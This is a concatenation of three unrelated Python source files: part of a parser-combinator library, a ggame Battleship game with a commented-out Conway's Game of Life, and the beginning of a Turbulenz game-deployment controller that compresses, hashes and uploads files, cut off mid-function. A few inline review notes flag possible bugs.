        self.__subrules.append(right_rule)
        return self

    def match(self, input_reader):
        """
        Try each alternative left-to-right; first match wins.

        @param input_reader: The input reader to read characters from.
        @type input_reader: InputReader
        @return: A list of token matched by the first matching subrule.
        """
        input_reader.checkPoint()
        for alternative in self.__subrules:
            try:
                result = alternative.match(input_reader)
            except ParseException:
                # This alternative rolled itself back; try the next one.
                continue
            input_reader.deleteCheckpoint()
            return self.returnToken(self.callAction(result))
        input_reader.rollback()
        raise ParseException("None of the subrules of %s matched." % str(self))
# TODO: unclear semantic
# class Not(Rule):
# """Negate the outcome of a rule
# Note: This does not consume any chars. It merely tells whether
# the given rule would match at this point
# """
# __rule = None
# def __init__(self, rule):
# self.__rule = rule
# def __str__(self):
# return "!%s" % self.__rule
# def match(self, input_reader):
# match = False
# try:
# input_reader.checkPoint()
# self.__rule.match(input_reader)
# input_reader.rollback()
# match = True
# except ParseException:
# input_reader.rollback()
# if match:
# input_reader.rollback()
# raise ParseException("Would not expect rule to match at %d" % input_reader.getPos())
# input_reader.deleteCheckpoint()
class Optional(Rule):
    """
    Match the subrule zero or one times: if the subrule does not
    match, the Optional() rule matches anyway (producing no token).
    """

    def __init__(self, rule):
        """
        @param rule: The rule to match optionally
        @type rule: Rule
        """
        self.__rule = rule

    def __str__(self):
        """Return a string representation of this rule."""
        return "[ %s ]" % str(self.__rule)

    def match(self, input_reader):
        """
        Match this rule against the input.

        @param input_reader: The input reader to read from.
        @type input_reader: InputReader
        @return: A list of token matched by the subrule, or None when
        the subrule did not match.
        """
        try:
            result = self.__rule.match(input_reader)
        except ParseException:
            # The subrule already rolled the reader back; an optional
            # rule simply matches nothing.
            return None
        logging.debug("Matched %s" % self)
        return self.returnToken(self.callAction(result))
class OneOrMore(Rule):
    """
    Match a rule once or more: the subrule must match at least once
    and is then repeated as often as possible.
    """

    def __init__(self, rule):
        """
        @param rule: The subrule to match.
        @type rule: Rule
        """
        self.__rule = rule

    def __str__(self):
        """Return a human-readable representation of the rule."""
        return "{ %s }1" % str(self.__rule)

    def match(self, input_reader):
        """
        Match the subrule greedily, requiring at least one match.

        @param input_reader: The input reader to read from.
        @type input_reader: InputReader
        @return: A list of token generated by the subrule.
        """
        # The first match is mandatory: let its ParseException escape.
        collected = [self.__rule.match(input_reader)]
        try:
            while True:
                collected.append(self.__rule.match(input_reader))
        except ParseException:
            # No further repetition matched; stop greedily collecting.
            pass
        return self.returnToken(self.callAction(collected))
class Combine(Rule):
    """
    Pseudo rule that recursively combines all of its children's token
    into one. Useful when the token of a group of subrules should be
    joined into a single string.
    """

    def __init__(self, rule):
        """
        @param rule: The subrule whose token are combined.
        @type rule: Rule
        """
        self.__rule = rule

    def __str__(self):
        """Return a human-readable description of the rule."""
        return "Combine(%s)" % str(self.__rule)

    def combine(self, token):
        """
        Recursively flatten a nested token structure into one string.

        @param token: the token list to combine into one string.
        @type token: list or str
        @return: the concatenated string, or None if token is None.
        """
        if token is None:
            return None
        parts = []
        for tok in token:
            if tok is None:
                # Bug fix: hidden subrules (e.g. inside OneOrMore) can
                # contribute None entries; skip them instead of crashing
                # on ``str + None``.
                continue
            if isinstance(tok, list):
                sub = self.combine(tok)
                if sub is not None:
                    parts.append(sub)
            else:
                parts.append(tok)
        return ''.join(parts)

    def match(self, input_reader):
        """
        Match the subrule and combine its token into a single string.

        @param input_reader: The input reader to read from.
        @type input_reader: InputReader
        @return: A string combining all the token generated by the subrule.
        """
        combined = self.combine(self.__rule.match(input_reader))
        return self.returnToken(self.callAction(combined))
def Word(param):
    """
    Shortcut for Combine(MatchWhite(OneOrMore(...))).

    If param is a string it is treated as a charset via AnyOf(param);
    otherwise param itself is used as the repeated subrule.
    """
    repeated = AnyOf(param) if isinstance(param, str) else param
    return Combine(MatchWhite(OneOrMore(repeated)))
class ZeroOrMore(Rule):
    """
    Match a rule as often as possible, including not at all.

    Unlike Optional(), which matches 0 or 1 times, this rule greedily
    consumes repetitions. Internally it is simply
    Optional(OneOrMore(rule)).
    """

    def __init__(self, rule):
        """
        @param rule: The subrule to match.
        @type rule: Rule
        """
        self.__rule = Optional(OneOrMore(rule))

    def __str__(self):
        """Return a human readable representation of the rule."""
        return "{ %s }" % str(self.__rule)

    def match(self, input_reader):
        """
        Match the input against the (wrapped) subrule.

        @param input_reader: The input reader to read from.
        @type input_reader: InputReader
        @return: A list of token generated by the matching of the subrule.
        """
        matched = self.__rule.match(input_reader)
        return self.returnToken(self.callAction(matched))
class IgnoreWhite(Rule):
    """
    Pseudo-rule that temporarily ignores whitespace.

    It matches nothing by itself: it switches the input reader into
    'ignore whitespace' mode, matches its subrule, and then restores
    the reader's previous whitespace mode — whether the subrule matched
    or raised.
    """

    def __init__(self, rule):
        """
        @param rule: The subrule to match.
        @type rule: Rule
        """
        self.__rule = rule

    def __str__(self):
        """Return a human-readable representation of this rule."""
        return "IgnoreWhite(%s)" % str(self.__rule)

    def match(self, input_reader):
        """
        Match the subrule with whitespace ignoring enabled.

        @param input_reader: The input reader to read any input from.
        @type input_reader: InputReader
        @return: The results of the subrule.
        """
        previous = input_reader.getIgnoreState()
        input_reader.setIgnoreState(True)
        try:
            result = self.__rule.match(input_reader)
        finally:
            # Robustness fix: restore the reader's mode via ``finally``
            # instead of the original bare ``except``/duplicate-reset pair.
            input_reader.setIgnoreState(previous)
        return self.returnToken(self.callAction(result))
class MatchWhite(Rule):
    """
    Pseudo-rule that temporarily matches whitespace.

    The counterpart of IgnoreWhite: it switches the input reader into
    'match whitespace' mode, matches its subrule and then restores the
    reader's previous whitespace mode — whether the subrule matched or
    raised.
    """

    def __init__(self, rule):
        """
        @param rule: The rule to match as a subrule.
        @type rule: Rule
        """
        self.__rule = rule

    def __str__(self):
        """Return a human-readable description of the rule."""
        return "MatchWhite(%s)" % str(self.__rule)

    def match(self, input_reader):
        """
        Match the subrule with whitespace matching enabled.

        @param input_reader: The input reader to read input from.
        @type input_reader: InputReader
        @return: A list of token generated by the subrule.
        """
        previous = input_reader.getIgnoreState()
        input_reader.setIgnoreState(False)
        # Skip whitespace in front of the subrule so it starts at the
        # first significant character.
        input_reader.skipWhite()
        try:
            result = self.__rule.match(input_reader)
        finally:
            # Robustness fix: restore the reader's mode via ``finally``
            # instead of the original bare ``except``/duplicate-reset pair.
            input_reader.setIgnoreState(previous)
        return self.returnToken(self.callAction(result))
class CallbackParser(Rule):
    """
    Match a single character by asking a user-supplied predicate.

    The callback receives the next input character and returns True if
    it should match, False otherwise.
    """

    def __init__(self, callback):
        """
        @param callback: The callback function determining the match.
        @type callback: Callable
        """
        self.__callback = callback

    def __str__(self):
        """Return a human-readable description of the rule."""
        return "CallbackParser(%s)" % str(self.__callback.__name__)

    def match(self, input_reader):
        """
        Read one character and accept it iff the callback approves.

        @param input_reader: The input reader to read input from.
        @type input_reader: InputReader
        @return: The matched character, if any.
        """
        input_reader.checkPoint()
        try:
            candidate = input_reader.getChar()
        except EndOfStringException:
            input_reader.rollback()
            raise ParseException('Preliminary end of string')
        if not self.__callback(candidate):
            input_reader.rollback()
            raise ParseException('Character did not match %s' % str(self))
        input_reader.deleteCheckpoint()
        return self.returnToken(self.callAction([candidate]))
class ErrorRule(Rule):
    """
    A rule that always fails with a parse exception.

    Not intended to be instantiated directly; use the predefined
    module-level variable ``error`` instead.
    """

    def __str__(self):
        """Return a human-readable description of the rule."""
        return "ErrorRule()"

    def match(self, input_reader):
        """
        Unconditionally raise a ParseException; consumes no input.
        """
        raise ParseException('Hit ErrorRule()')
# Ready-made terminal rules.
alpha = CallbackParser(lambda char: char.isalpha())  # one alphabetic character
digit = CallbackParser(lambda char: char.isdigit())  # one decimal digit
# NOTE(review): callAction() always wraps a non-list value in a list before
# invoking the action, so ``int(i)`` appears to receive a list here —
# verify this action against Combine's return value before relying on it.
integer = Word(digit).setAction(lambda i: int(i))
hexdigit = AnyOf('0123456789abcdefABCDEF')  # one hexadecimal digit
error = ErrorRule()  # always-failing rule for explicit grammar errors
def parse(parser, string, ignore_white=True):
    """
    Parse an input string with a given grammar.

    This is the main entry point: it sets up the InputReader and wraps
    the produced token in a ParseResult so callers don't have to.

    @param parser: The entry point to the grammar defined by Rule objects as provided by the framework.
    @type parser: Rule
    @param string: The input string to parse.
    @type string: str
    @param ignore_white: True if the input reader should ignore whitespaces, False otherwise.
    @type ignore_white: boolean
    @return: A ParseResult object containing the results of the parsing of the input string.
    """
    reader = InputReader(string, ignore_white)
    return ParseResult(reader, parser.match(reader))
| |
from ggame import App, RectangleAsset, ImageAsset, Sprite, LineStyle, Color, Frame
from random import randrange
# Colour palette shared by both boards.
black = Color(0x000000, 1.0)
blue = Color(0x2D9FC2,1.0)
white = Color(0xFFFFFF, 1.0)
red = Color(0xFC5D5D,1.0)
grey = Color(0x858585,1.0)
thinline = LineStyle(1, black)
# Side length of one grid cell in pixels.
celld = 35
# Cell assets: red marks ship/hit cells, blue is the ocean cover,
# white is the board background, grey is the player's own ships.
# rectangle4 (black) is not used in the visible setup code.
rectangle3 = RectangleAsset(celld, celld, thinline, red)
rectangle = RectangleAsset(celld, celld, thinline, blue)
rectangle2 = RectangleAsset(celld, celld, thinline, white)
rectangle4 = RectangleAsset(celld, celld, thinline, black)
rectangle5 = RectangleAsset(celld, celld, thinline, grey)
# Sprite lookup tables keyed by (x, y) grid coordinates.
ocean = {}            # top board: blue tiles hiding the enemy fleet
oceanself = {}        # bottom board: blue tiles over the player's fleet
enemyBoats = {}       # hidden enemy ship sprites
selfBoats = {}        # player's ship sprites
selfBoatsalive = {}   # player ship cells placed (and not yet sunk)
enemyboatsalive = {}  # enemy ship cells placed
enemyboatsunk = {}    # enemy cells already hit by the player
selfBoatssunk = {}    # red markers for hit player cells
cpushots = {}         # squares the CPU has already fired at
# Ship placement parameter and game-state flags.
length = 5
height = 10
width = 10
overlapping = True
shipsmadevisible = 0
shooting = False
class cell(Sprite):
    """A single board square; cells start out shown."""

    def __init__(self, asset, position):
        super().__init__(asset, position)
        # Revealed by default (e.g. the blue ocean cover).
        self.visible = True
class enemyships(Sprite):
    """An enemy ship cell; hidden until placement marks it visible."""

    def __init__(self, asset, position):
        super().__init__(asset, position)
        # Enemy ships start concealed from the player.
        self.visible = False
# Build both 10x10 boards. The top board ("screen one") holds the enemy
# fleet hidden under blue ocean tiles; the bottom board ("screen two"),
# shifted down by yshift pixels, shows the player's fleet. The bottom
# board's dicts are keyed with y+10 so the two boards share one
# coordinate space.
for x in range(0, height):
    for y in range(0, width):
        #screen one set up
        Sprite(rectangle2, (x*celld, y*celld))
        enemyBoats[(x,y)] = enemyships(rectangle3, (x*celld, y*celld))
        ocean[(x,y)] = cell(rectangle, (x*celld, y*celld))
        #screen two set up
        yshift = height*celld + 20
        Sprite(rectangle2, (x*celld, y*celld + yshift))
        selfBoats[(x,y+10)] = cell(rectangle5, (x*celld, y*celld + yshift))
        selfBoatssunk[(x,y+10)] = cell(rectangle3, (x*celld, y*celld + yshift))
        oceanself[(x,y+10)] = cell(rectangle, (x*celld, y*celld + yshift))
# Randomly place three enemy ships of sizes 4, 3 and 2 (9 cells total).
# Each attempt picks a random anchor and direction; when ships overlap,
# fewer than 9 cells end up visible and placement is retried.
# NOTE(review): ``length`` is never reset between retries and stale
# entries stay in enemyboatsalive, so a retry seemingly cannot reach 9
# visible cells again — verify the retry path actually terminates.
while overlapping == True:
    shipsmadevisible = 0
    # Clear the previous (overlapping) attempt.
    for aaa in range(0, height):
        for bbb in range(0, width):
            enemyBoats[(aaa,bbb)].visible = False
    for a in range(0, 3):
        randx = randrange(1, 10)
        randy = randrange(1, 10)
        # Grow the ship away from the nearer border so it stays on-board.
        if randx > 5:
            nsx = -1
        else:
            nsx = 1
        if randy > 5:
            nsy = -1
        else:
            nsy = 1
        # Coin flip: 2 = extend along x, otherwise extend along y.
        randxy = randrange(1, 3)
        for u in range(0, length-1):
            enemyBoats[(randx+nsx,randy+nsy)].visible = True
            enemyboatsalive[(randx+nsx,randy+nsy)] = (randx+nsx,randy+nsy)
            if randxy == 2:
                randx = randx + 1
            else:
                randy = randy + 1
        # Each subsequent ship is one cell shorter (4, 3, 2).
        length = length - 1
    # Count visible ship cells; overlapping ships collapse cells and
    # lower the count below 9.
    for aa in range(0, height):
        for bb in range(0, width):
            if enemyBoats[(aa,bb)].visible == True:
                shipsmadevisible =shipsmadevisible + 1
    if shipsmadevisible == 9:
        overlapping = False
class Battleship(App):
    """
    ggame application implementing the two-board battleship game.

    Before the space key is pressed, clicks on the lower board place or
    remove the player's ship cells; afterwards, clicks fire at the top
    (enemy) board and the CPU returns fire in step().
    """

    def __init__(self):
        # Space ends the ship-placement phase and starts shooting.
        Battleship.listenKeyEvent("keydown", "space", self.spaceclick)
        SCREEN_WIDTH = 1000
        SCREEN_HEIGHT = 1000
        self.going = False       # True once the shooting phase started
        self.squarehit = 0       # enemy ship cells the player has hit
        self.playerturn = True   # False while the CPU owes a return shot
        self.nonalcoholicshotstaken = 0  # count of player shots fired
        super().__init__(SCREEN_WIDTH, SCREEN_HEIGHT)
        Battleship.listenMouseEvent("click",self.breathlife)

    def spaceclick(self,event):
        """Space pressed: switch from placement to the shooting phase."""
        self.going = True

    def breathlife(self, event):
        """
        Handle a mouse click: toggle an own-ship cell during placement,
        or fire at the enemy board once the game is running.
        """
        # Convert pixel coordinates to grid coordinates.
        self.cx = int(event.x/celld)
        self.cy = int(event.y/celld)
        if self.playerturn == True:
            if self.going == False:
                # Placement: toggle a ship cell on the lower board.
                # NOTE(review): the cy-1 offset looks like a correction
                # for the board gap — confirm against celld and yshift.
                if (self.cx, self.cy-1) in oceanself:
                    oceanself[(self.cx, self.cy-1)].visible = not oceanself[(self.cx, self.cy-1)].visible
                    selfBoats[(self.cx,self.cy-1)].visible = not selfBoats[(self.cx,self.cy-1)].visible
                    selfBoatsalive[(self.cx,self.cy-1)] = (self.cx,self.cy-1)
            else:
                # Shooting: uncover the clicked square on the top board.
                if (self.cx, self.cy) in ocean:
                    ocean[(self.cx, self.cy)].visible = False
                    # Count each enemy cell as a hit only once.
                    if (self.cx, self.cy) in enemyboatsalive and (self.cx, self.cy) not in enemyboatsunk:
                        self.squarehit = self.squarehit + 1
                        enemyboatsunk[self.cx, self.cy] = "hit"
            if self.going == True:
                # A shot was taken; hand the turn to the CPU.
                self.playerturn = False
                self.nonalcoholicshotstaken = self.nonalcoholicshotstaken + 1

    def step(self):
        """Per-frame update: reveal the board on a win, run the CPU shot."""
        if self.squarehit == 9:
            # All 9 enemy ship cells hit: uncover the whole enemy board.
            for j in range(0, height):
                for k in range(0, width):
                    ocean[(j,k)].visible = False
        if self.going == True:
            if self.playerturn == False:
                # CPU fires at a random square of the player's board
                # (y keys 10-19 address the lower board).
                # NOTE(review): repeats are possible — the cpushots
                # de-duplication below is commented out.
                #while shooting == False:
                randshotx = randrange(0, 10)
                randshoty = randrange(10, 20)
                #if (randshotx, randshoty) not in cpushots:
                #shooting = True
                cpushots[(randshotx, randshoty)] = (randshotx, randshoty)
                print("shots fired")
                oceanself[(randshotx, randshoty)].visible = False
                if (randshotx, randshoty) in selfBoatsalive:
                    selfBoats[(randshotx, randshoty)].visible = False
                    selfBoatssunk[(randshotx, randshoty)].visible = True
                    print("hit")
                self.playerturn = True
# Create the app and enter ggame's main loop.
myapp = Battleship()
myapp.run()
"""
from ggame import App, RectangleAsset, ImageAsset, Sprite, LineStyle, Color, Frame
black = Color(0x000000, 1.0)
green = Color(0x00ff00, 1.0)
orange = Color(0xFF8400,1.0)
thinline = LineStyle(1, black)
a = 0
b = 0
height = 20
width = 20
ocean = {}
thinline = LineStyle(1, black)
rectangle = RectangleAsset(20, 20, thinline, green)
rectangle2 = RectangleAsset(20, 20, thinline, orange)
class cell(Sprite):
def __init__(self, asset, position):
super().__init__(asset, position)
self.visible = False
self.sca = 0
for x in range(0, height):
for y in range(0, width):
Sprite(rectangle2, (x*height, y*width))
ocean[(x,y)] = cell(rectangle, (x*height, y*width))
class ConwayGame(App):
def __init__(self):
ConwayGame.listenKeyEvent("keydown", "space", self.spaceclick)
SCREEN_WIDTH = 640
SCREEN_HEIGHT = 480
self.going = False
super().__init__(SCREEN_WIDTH, SCREEN_HEIGHT)
ConwayGame.listenMouseEvent("click",self.breathlife)
def breathlife(self, event):
self.cx = int(event.x/20)
self.cy = int(event.y/20)
ocean[(self.cx, self.cy)].visible = not ocean[(self.cx, self.cy)].visible
def spaceclick(self,event):
self.going = not self.going
def step(self):
if self.going == True:
for g in range(0, height):
for f in range(0, width):
if ocean[(g,f)].visible == True:
ocean[(g,f)].sca = ocean[(g,f)].sca - 1
for w in range(-1, 2):
for h in range(-1, 2):
if (w+g, h+f) in ocean and ocean[(w+g, h+f)].visible == True:
ocean[(g,f)].sca = ocean[(g,f)].sca + 1
for s in range(0, height):
for d in range(0, width):
if ocean[(s, d)].visible == True and ocean[(s, d)].sca < 2:
ocean[(s, d)].visible = False
elif ocean[(s, d)].visible == True and ocean[(s, d)].sca > 3:
ocean[(s, d)].visible = False
elif ocean[(s, d)].visible == False and ocean[(s, d)].sca == 3:
ocean[(s, d)].visible = True
ocean[(s,d)].sca = 0
myapp = ConwayGame()
myapp.run()
"""
| |
# Copyright (c) 2010-2014 Turbulenz Limited
"""
Controller class for deploying a game
"""
from urllib3.exceptions import HTTPError, SSLError
from simplejson import dump as json_dump, load as json_load, loads as json_loads, JSONDecodeError
from os import stat, sep, error, rename, remove, makedirs, utime, access, R_OK, walk
from os.path import join, basename, abspath, splitext, sep, isdir, dirname
from errno import EEXIST
from stat import S_ISREG
from glob import iglob
from logging import getLogger
from mimetypes import guess_type
from gzip import GzipFile
from shutil import rmtree
from Queue import Queue
from threading import Thread
from time import time
from subprocess import Popen, PIPE
# pylint: disable=F0401
from poster.encode import gen_boundary, get_headers, MultipartParam
# pylint: enable=F0401
from turbulenz_local.tools import get_absolute_path, get_7zip_path
from turbulenz_tools.utils.hash import hash_file_sha256_md5, hash_file_sha256, hash_file_md5
from turbulenz_local import __version__
LOG = getLogger(__name__)
def _update_file_mtime(file_path, mtime):
    """
    Set the file's atime/mtime to *mtime* rounded up to the next second.

    Rounding up avoids precision problems when the stored floating
    point timestamps are compared later.
    NOTE: ``long`` makes this module Python-2-only.
    """
    mtime = long(mtime) + 1
    utime(file_path, (mtime, mtime))
def _get_upload_file_token(index, filename):
# We build the upload token using an index and the file extension since the hub doesn't care
# about the actual filename only the extension
return '%d%s' % (index, splitext(filename)[1])
def _get_cached_file_name(file_name, file_hash, file_length):
return '%s%x%s' % (file_hash, file_length, splitext(file_name)[1])
# pylint: disable=R0902
class Deployment(object):
    """Deploys a game's files to the hub, using a local gzip/hash cache."""

    # Whether the hub supports checking many files in one request; reset
    # to False in batch_check_files() when the hub answers in the legacy
    # one-by-one format.
    _batch_checks = True
    # Placeholder metadata used for files missing from the cache.
    _empty_meta_data = {'length': 0,
                        'hash': '',
                        'md5': ''}
    # URL pieces for the hub's "is this file already uploaded?" check.
    _base_check_url = '/dynamic/upload/check?'
    _check_url_format = 'name=%s&hash=%s&length=%d'
    _cached_hash_folder = '__cached_hashes__'
    _cached_hash_ttl = (30 * 24 * 60 * 60) # 30 days
    # Extensions that are skipped when gzipping, either because the
    # format already uses compression or because the browser needs the
    # file uncompressed.
    _do_not_compress = set([ 'ogg',
                             'png',
                             'jpeg',
                             'jpg',
                             'gif',
                             'ico',
                             'mp3',
                             'wav',
                             'swf',
                             'webm',
                             'mp4',
                             'm4v',
                             'm4a',
                             'aac' ])
    # Version-control metadata directories excluded from deployment.
    _directories_to_ignore = set([ '.git',
                                   '.hg',
                                   '.svn' ])
def __init__(self, game, hub_pool, hub_project, hub_version, hub_versiontitle, hub_cookie, cache_dir):
    """
    Capture everything needed to upload *game* to the hub.

    @param game: The local game object to deploy (paths, mains, file list).
    @param hub_pool: urllib3 connection pool used for hub requests.
    @param hub_project: Hub project to deploy into.
    @param hub_version: Version identifier for this deployment.
    @param hub_versiontitle: Human-readable title of the version.
    @param hub_cookie: Session cookie sent with every hub request.
    @param cache_dir: Root directory of the local gzip/hash cache.
    """
    self.path = abspath(get_absolute_path(game.path))
    self.plugin_main = game.plugin_main
    self.canvas_main = game.canvas_main
    self.flash_main = game.flash_main
    self.mapping_table = game.mapping_table
    self.files = game.deploy_files.items
    self.engine_version = game.engine_version
    self.is_multiplayer = game.is_multiplayer
    self.aspect_ratio = game.aspect_ratio
    self.cache_dir = cache_dir
    # Per-game cache directory: <cache_dir>/<game slug>.
    self.game_cache_dir = join(abspath(cache_dir), game.slug)
    self.stopped = False
    self.hub_project = hub_project
    self.hub_version = hub_version
    self.hub_versiontitle = hub_versiontitle
    self.hub_session = None
    self.hub_pool = hub_pool
    self.hub_cookie = hub_cookie
    # Timeout (seconds) for hub HTTP requests.
    self.hub_timeout = 200
    # Progress counters updated while hashing/uploading.
    self.total_files = 0
    self.num_files = 0
    self.num_bytes = 0
    self.uploaded_files = 0
    self.uploaded_bytes = 0
    self.done = False
    self.error = None
    # Make sure the gzip cache directory exists; pre-existing is fine.
    try:
        makedirs(self.get_gzip_dir())
    except OSError as e:
        if e.errno != EEXIST:
            LOG.error(str(e))
def get_meta_data_path(self):
    """Return the path of this game's gzipped JSON metadata cache."""
    return '%s.json.gz' % self.game_cache_dir
def get_gzip_dir(self):
    """Return the game's gzip cache directory with forward slashes."""
    normalized = self.game_cache_dir.replace('\\', '/')
    return normalized
def deploy(self, ultra=False):
    """
    Upload all files, then tell the hub the session is finished.

    Depending on whether the upload completed, the hub session is
    closed via '/dynamic/upload/end' or '/dynamic/upload/cancel'.

    @param ultra: Passed through to upload_files (maximum compression).
    """
    self.done = self.upload_files(ultra)
    if self.hub_session:
        endpoint = '/dynamic/upload/end' if self.done else '/dynamic/upload/cancel'
        try:
            self.hub_pool.request('POST',
                                  endpoint,
                                  fields={'session': self.hub_session},
                                  headers={'Cookie': self.hub_cookie},
                                  redirect=False,
                                  retries=5,
                                  timeout=self.hub_timeout)
        except (HTTPError, SSLError) as e:
            LOG.error(e)
def cancel(self):
    """Abort the deployment, marking it as cancelled by the user."""
    self.stop('Canceled.')
def stop(self, error_msg):
    """
    Stop the deployment and record the reason.

    @param error_msg: Message explaining why the deployment stopped.
    """
    self.stopped = True
    self.error = error_msg
def read_metadata_cache(self):
    """
    Load the cached per-file metadata from the gzipped JSON cache.

    @return: (cache_time, meta_data_cache) tuple; cache_time is -1 and
             the dict empty when the cache is missing or unreadable.
    """
    file_name = self.get_meta_data_path()
    try:
        gzip_file = GzipFile(filename=file_name, mode='rb')
        try:
            meta_data_cache = json_load(gzip_file)
        finally:
            # Bug fix: close the handle even when the JSON is corrupt,
            # instead of leaking it on the error path.
            gzip_file.close()
        cache_time = stat(file_name).st_mtime
    except (IOError, ValueError):
        cache_time = -1
        meta_data_cache = {}
    return cache_time, meta_data_cache
def write_metadata_cache(self, meta_data, force_mtime):
    """
    Persist *meta_data* to the gzipped JSON cache.

    Failures are ignored: the cache is only an optimization and is
    rebuilt by re-hashing when missing.

    @param meta_data: Mapping of relative path -> file metadata.
    @param force_mtime: When > 0, force the cache file's mtime to it.
    """
    try:
        file_path = self.get_meta_data_path()
        gzip_file = GzipFile(filename=file_path,
                             mode='wb',
                             compresslevel=9)
        try:
            json_dump(meta_data, gzip_file, separators=(',', ':'), sort_keys=True)
        finally:
            # Bug fix: close the handle even when the dump fails,
            # instead of leaking it on the error path.
            gzip_file.close()
        if force_mtime > 0:
            _update_file_mtime(file_path, force_mtime)
    except (IOError, OSError):
        pass
def delete_unused_cache_files(self, meta_data, meta_data_cache):
    """
    Remove cached gzip files whose entries vanished from *meta_data*.

    @param meta_data: Current mapping of relative path -> metadata.
    @param meta_data_cache: Previously cached mapping.
    """
    # Iterating a dict yields its keys, so set(d) == set(d.iterkeys()).
    stale_paths = set(meta_data_cache) - set(meta_data)
    if not stale_paths:
        return
    gzip_cache_dir = self.get_gzip_dir()
    for relative_path in stale_paths:
        cache_file_name = '%s/%s.gz' % (gzip_cache_dir, relative_path)
        if access(cache_file_name, R_OK):
            remove(cache_file_name)
def batch_check_files(self, files, checked_queue_put):
    """
    Ask the hub which of *files* still need uploading.

    Tries one batched GET first; a 200 answer lists the missing upload
    tokens. Older hubs answer 304/404 for the first file only, in which
    case this switches permanently to legacy one-request-per-file
    checks. Each file tuple is pushed to *checked_queue_put* either
    whole (needs upload + cache update) or trimmed to 5 elements
    (cache update only).

    @param files: List of file tuples; f[1]=relative path, f[2]=length,
                  f[3]=hash (per the query format used below).
    @param checked_queue_put: Queue.put-style callable receiving results.
    """
    # Hoist frequently used attributes into locals for the loop below.
    urlopen = self.hub_pool.urlopen
    base_url = self._base_check_url
    url_format = self._check_url_format
    get_upload_token = _get_upload_file_token
    timeout = self.hub_timeout
    if self._batch_checks:
        # One query string covering every file, keyed by upload token.
        query = '&'.join((url_format % (get_upload_token(i, f[1]), f[3], f[2])) for i, f in enumerate(files))
        r = urlopen('GET',
                    base_url + query,
                    redirect=False,
                    assert_same_host=False,
                    timeout=timeout)
        if r.status == 200:
            # pylint: disable=E1103
            missing_files = set(json_loads(r.data).get('missing', []))
            # pylint: enable=E1103
            for i, f in enumerate(files):
                if get_upload_token(i, f[1]) in missing_files:
                    # Update meta data cache and upload
                    checked_queue_put(f)
                else:
                    # Only needs to update meta data cache
                    checked_queue_put((f[1], f[2], f[3], f[4], f[5]))
            return
        else:
            # Legacy hub: the response only covers the first file.
            f = files.pop(0)
            if r.status == 304:
                # First one only needs to update meta data cache
                checked_queue_put((f[1], f[2], f[3], f[4], f[5]))
            elif r.status == 404:
                # First one needs to update meta data cache and to upload
                checked_queue_put(f)
            else:
                raise Exception(r.reason)
            # NOTE(review): after pop(0) this leaves one file unchecked
            # when exactly one remains — verify this early-out is intended.
            if len(files) == 1:
                return
            # Legacy format, check one by one...
            self._batch_checks = False
    r = None
    for f in files:
        query = url_format % (basename(f[1]), f[3], f[2])
        if urlopen('GET',
                   base_url + query,
                   redirect=False,
                   assert_same_host=False,
                   timeout=timeout).status == 304:
            # Only needs to update meta data cache
            checked_queue_put((f[1], f[2], f[3], f[4], f[5]))
        else:
            # Update meta data cache and upload
            checked_queue_put(f)
# pylint: disable=R0914,R0915
def check_files(self, files, start, end, checked_queue_put, hashes, ultra, cache_time, meta_data_cache):
    """Worker loop: examine files[start:end], (re)compress and hash as needed.

    Results are reported through checked_queue_put as:
      - relative_path (string)            -> invalid/empty file, skip it
      - (rel, size, hash, mtime)          -> unchanged, nothing to do
      - (rel, size, hash, md5, mtime)     -> only meta data cache update
      - (deploy, rel, size, hash, md5, mtime) -> candidate for upload,
        batched through batch_check_files in groups of 10

    hashes -- set of cached-file names already known to the Hub
    ultra -- use maximum 7zip compression settings when True
    cache_time / meta_data_cache -- previous scan results used to skip work
    """
    files_to_batch_check = []
    base_path_len = len(self.path)
    if not self.path.endswith(sep):
        base_path_len += 1
    gzip_cache_dir = self.get_gzip_dir()
    compressor_path = get_7zip_path()
    empty_meta_data = self._empty_meta_data
    get_cached_file_name = _get_cached_file_name
    while start < end:
        if self.stopped:
            checked_queue_put(None)  # Make sure the waiting thread wakes up
            break
        abs_path = files[start]
        start += 1
        relative_path = abs_path[base_path_len:]
        try:
            file_stat = stat(abs_path)
            file_size = file_stat.st_size
            if not S_ISREG(file_stat.st_mode) or file_size <= 0:  # Not a valid file
                checked_queue_put(relative_path)
                continue
            calculate_hash = update_meta_data = False
            # Use the newer of mtime/ctime so metadata-only changes count too
            file_time = max(file_stat.st_mtime, file_stat.st_ctime)
            if cache_time < file_time:
                calculate_hash = True
            else:
                old_meta_data = meta_data_cache.get(relative_path, empty_meta_data)
                if file_size != old_meta_data['length']:
                    calculate_hash = True
                else:
                    # Cached entry still valid: reuse the stored hashes
                    file_hash = old_meta_data['hash']
                    file_md5 = old_meta_data['md5']
            # Avoid compressing some files because they either already use 'deflate' or
            # because the browser needs them uncompressed
            if relative_path.split('.')[-1] not in self._do_not_compress:
                deploy_file_name = '%s/%s.gz' % (gzip_cache_dir, relative_path)
                do_compress = False
                try:
                    file_stat = stat(deploy_file_name)
                    if file_stat.st_mtime < file_time:
                        # Cached gzip is older than the source: rebuild it
                        do_compress = True
                    elif file_stat.st_size >= file_size:
                        # Compression did not help: deploy the original file
                        deploy_file_name = abs_path
                except error:
                    # No cached gzip yet
                    do_compress = True
                if do_compress:
                    if compressor_path:
                        if ultra:
                            process = Popen([compressor_path,
                                             'a', '-tgzip',
                                             '-mx=9', '-mfb=257', '-mpass=15',
                                             deploy_file_name, abs_path],
                                            stdout=PIPE, stderr=PIPE)
                        else:
                            process = Popen([compressor_path,
                                             'a', '-tgzip',
                                             deploy_file_name, abs_path],
                                            stdout=PIPE, stderr=PIPE)
                        update_meta_data = True
                        if calculate_hash:
                            # Hash while 7zip compresses in the background
                            calculate_hash = False
                            file_hash = hash_file_sha256(abs_path)
                        output, _ = process.communicate()
                        if process.poll():
                            # Non-zero exit status from 7zip
                            self.stop('Error compressing file "%s": "%s".' % (relative_path, str(output)))
                            continue
                        else:
                            try:
                                if stat(deploy_file_name).st_size >= file_size:
                                    # Compression did not help: deploy the original
                                    deploy_file_name = abs_path
                            except error as e:
                                self.stop('Error opening compressed file "%s": "%s".' % (deploy_file_name, str(e)))
                                continue
                            file_md5 = hash_file_md5(deploy_file_name)
                    else:
                        # Compress with Python gzip, will warn that 7zip is preferred
                        cache_dir = dirname(deploy_file_name)
                        try:
                            makedirs(cache_dir)
                        except OSError as e:
                            if e.errno != EEXIST:
                                self.stop('Error compressing file "%s": "%s".' % (relative_path, str(e)))
                                continue
                        try:
                            with GzipFile(deploy_file_name, mode='wb', compresslevel=9) as gzipfile:
                                with open(abs_path, 'rb') as f:
